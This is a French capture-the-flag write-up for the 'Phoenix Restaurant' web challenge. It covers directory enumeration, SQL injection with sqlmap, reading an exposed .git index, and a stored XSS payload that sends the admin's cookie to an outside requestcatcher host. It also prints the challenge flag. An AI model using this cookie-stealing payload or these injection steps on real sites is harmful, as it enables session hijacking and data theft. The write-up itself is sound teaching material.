![Contexte](images/web-2.png)

**Nom:** Phoenix Restaurant

**pts:** 260

**Lien:** http://thephoenixquest.acxsit.com:30150/

**Fisrt blood 🩸**

# Analyse du Contexte

Parfois, il est important d'analyser le contexte du challenge avant de se lancer... Mais cela dépend aussi de la situation. Dans le contexte de ce challenge, l'analyse du contexte est primordiale.

En lisant attentivement ce contexte, on retient deux choses principales :

1. _Les clients du royaume partagent leurs avis sur une plateforme en ligne._

2. _Le chef Orion, fier de sa réputation, consulte régulièrement ces avis pour assurer la qualité de son service._

À partir de ces deux éléments et selon mes expériences passées en CTF, j'émets les hypothèses suivantes :

_Il existerait un commentaire quelque part dans la base de données qui ne serait pas visible sur la plateforme._

_Il pourrait y avoir un moyen de se connecter à la page admin pour lire les commentaires (peut-être cachés par l'admin ?), ce qui rejoint la première hypothèse._

_Il existerait des ressources accessibles uniquement par l'admin auxquelles nous devrions avoir accès._

Avec ces hypothèses, on peut supposer qu'une fois l'accès à la base de données de l'application obtenu, il serait possible de résoudre le challenge.


# Énumération 

`dirsearch -u http://thephoenixquest.acxsit.com:30150/ -i 200,500`

Ceci nous permet de lister les endpoint caché de l'application...

![Contexte](images/web-2-1.png)

On y reviendra dans la recherche de faille... 

# Recherche de failles

Il s'agit d'un formulaire, tout comme le premier challenge [ici](https://gitlab.com/parfaittolefo23/n4t10n/-/blob/main/The%20Phoenix%20Quest%20CTF%20Writeup/Web/Rise_from_the_Ashes.md) j'ai pensé aux failes **SQLi** et **XSS**

Suivez les étapes du précédent challenge pour l'exploit SQLi... La suivante image présente le résultat d'une simple injection de `'` dans le champ _nom_

![sql_error](images/web-2-3.png)

Comme le formulaire est en `POST`, il est plus facile de capturer la requette POST dans un fichier et l'utilisé avec sqlmap.

`sqlmap -r sqli.txt --dbs`

![sqlmap](images/web-2-4.png)

Après avoir dump la DB _**xss_challenge**_, celle ci ne contenait pas le flag... Mais le **nom** de la DB nous renvoi vers XSS à présent...

![xss_challenge](images/web-2-5.png)

C'est le moment de revenir à l'[Énumération](https://gitlab.com/parfaittolefo23/n4t10n/-/edit/main/The%20Phoenix%20Quest%20CTF%20Writeup/Web/Phoenix_Restaurant.md#recherche-de-failles)

En accédant aux endpoints, j'ai pu téléchargé `/.git/index` et voici le contenu en strings

![index git](images/web-2-7.png)

    DIRC
    README.md
    sqli/.dockerignore
    sqli/Dockerfile
    sqli/conf/mysql-init.sql
    sqli/conf/supervisord.conf
    sqli/src/db.php
    1Y"p
    sqli/src/index.php
    sqli/src/process.php
    sqli/src/style.css
    xss/admin.php
    xss/assets/.htaccess
    xss/assets/admin.js
    xss/assets/image.png
    xss/assets/reviews.css
    xss/assets/script.js
    xss/assets/style.css
    xss/db.php
    xss/fetch_logs.php
    xss/gd.ts
    wn,b
    xss/index.php
    xss/init.sql
    xss/login.php
    S.]@,
    xss/reviews.php
    xss/submit_review.php
    TREE
    24 2
        >.(
    15 1
    B?V5assets
    sqli
    conf
Les fichiers de `sqli/` étaient inaccessible, seuls les fichiers de `xss/` étaient accessibles comme `/` on peut conclure que la root dir est `xss/`

En fouillant les fichiers listés dans index git, je tombe ici: http://thephoenixquest.acxsit.com:30150/gd.ts

![gd.ts](images/web-2-8.png)

De ceci, il est claire qui faut acceder à `fetch_logs.php` pour avoir le flag...

![gd.ts](images/web-2-9.png)

J'ai set mon **PHPSESSID** comme celui du fichier _gd.ts_ mais j'obtient un accès interdit...

Alors quoi faire !!!

On sait à présent qu'il sagit de XSS et il nous faut un **PHPSESSID** valide avec les droits admin. En se réfférant au retenu 2 de la **Phase d'Analyse** on pourait voler le cookie de l'admin au moment où il visiterait nos commantaires...

# Recherche d'exploit et exploitation

Il nous faut mettre une écoute HTTP sur laquelle sera renvoyé le cookie de l'admin... Dans mon cas, j'utilise [requestcatcher](https://requestcatcher.com/)


Payloads: `<script>var i=new Image; i.src="https://cyberai.requestcatcher.com/test?cookie"+document.cookie;</script>`

FLAG: TPQCTF{stored_xxs_attack_or_weak_cr3ds_4593}


